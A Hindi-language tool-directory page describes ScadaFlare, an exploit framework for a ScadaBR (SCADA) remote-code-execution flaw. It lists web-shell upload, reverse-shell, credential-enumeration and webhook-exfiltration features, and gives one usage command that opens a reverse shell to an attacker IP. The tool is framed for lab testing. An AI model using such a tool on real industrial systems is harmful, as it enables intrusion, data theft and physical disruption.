Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-26828-Ultimate — ScadaBR (CVE-2021-26828) के लिए ScadaFlare प्रमाणित RCE एक्सप्लॉइट फ्रेमवर्क OpenPLC ScadaBR | Kitploit
उपकरण/GitHubGitHub/ridpath/cve-2021-26828-ultimate
पेलोड जनरेशनभेद्यता विश्लेषणशोषणSCADA/ICS सुरक्षावेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaBR (CVE-2021-26828) के लिए ScadaFlare प्रमाणित RCE एक्सप्लॉइट फ्रेमवर्क OpenPLC ScadaBR

58 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

ScadaFlare - CVE-2021-26828 प्रमाणित RCE शोषण टूलकिट

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

ScadaBR <1.1.0 को लक्षित करने वाला एक मॉड्यूलर पोस्ट-प्रमाणीकरण RCE शोषण, रेड टीम ऑप्स के लिए उन्नत।

ScadaFlare Demo

विशेषताएँ

  • view_edit.shtm के माध्यम से weaponized .jsp शेल अपलोड करता है
  • लिनक्स और विंडोज़ पेलोड के लिए समर्थन
  • SOCKS5 / HTTP प्रॉक्सी समर्थन
  • रिवर्स शेल ट्रिगर (मानक या base64)
  • एन्यूमरेशन मॉड्यूल (DB, क्रेड्स, Log4Shell, आदि)
  • Webhook एक्सफिल (Slack / Discord)
  • Metasploit संसाधन स्क्रिप्ट जनरेशन
  • क्लीनअप समर्थन (किल स्विच)

MITRE ATT&CK तकनीक मैपिंग

CVE

  • CVE-2021-26828
  • Fellipe Oliveira द्वारा खोजा गया
  • शोषण उन्नत और मॉड्यूलरीकृत

यह क्यों मौजूद है

यह शोषण HTB Pro Lab: Alchemy परिदृश्य के विश्लेषण के दौरान विकसित किया गया था। Fellipe Oliveira का मूल PoC ठोस था लेकिन:

Python 2 में लिखा गया था

प्रॉक्सी समर्थन, शेल क्लीनअप, एन्यूमरेशन चेनिंग जैसी आधुनिक सुविधाओं का अभाव था

रेड टीम वर्कफ़्लो में विस्तार या एकीकृत करना कठिन था

यह संस्करण, ScadaFlare, Python 3 में मॉड्यूलर समर्थन, कई चोरी रणनीतियों, OS डिटेक्शन ओवरराइड, webhook एकीकरण, SOCKS प्रॉक्सी समर्थन, और वास्तविक दुनिया के ऑपरेटर उपयोग के लिए एन्यूमरेशन चेन के साथ एक पूर्ण पुनर्लेखन है।

उपयोग

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

केवल कानूनी और नैतिक उपयोग

ScadaFlare को केवल के लिए डिज़ाइन किया गया है:

  • नैतिक हैकिंग शिक्षा
  • SCADA लैब परीक्षण
  • रक्षात्मक अनुसंधान और भेद्यता सत्यापन

वास्तविक औद्योगिक प्रणालियों के विरुद्ध अनधिकृत उपयोग:

  • भौतिक प्रक्रियाओं को बाधित कर सकता है
  • क्षति या सुरक्षा खतरे पैदा कर सकता है
  • गंभीर कानूनी परिणाम दे सकता है

इस उपकरण का उपयोग करके आप पूर्ण जिम्मेदारी स्वीकार करते हैं:

  • स्पष्ट लिखित प्राधिकरण प्राप्त करना
  • केवल अनुमोदित वातावरण में संचालन करना

लाइसेंस

MIT License – LICENSE देखें

टूल डाउनलोड करें
चरणतकनीकID
प्रारंभिक पहुँच (पोस्ट-प्रमाणीकरण)Valid AccountsT1078
निष्पादनExploit Public-Facing ApplicationT1190
कमांड निष्पादनWeb ShellT1505.003
विशेषाधिकार क्रियाएँModify Web ContentT1505
क्रेडेंशियल एक्सेसCredential in Configuration FilesT1552.001
खोजRemote System DiscoveryT1018
बाह्य निष्कासनExfiltration Over Web ServiceT1567.002
रक्षा चोरीProxy & Protocol TunnelingT1090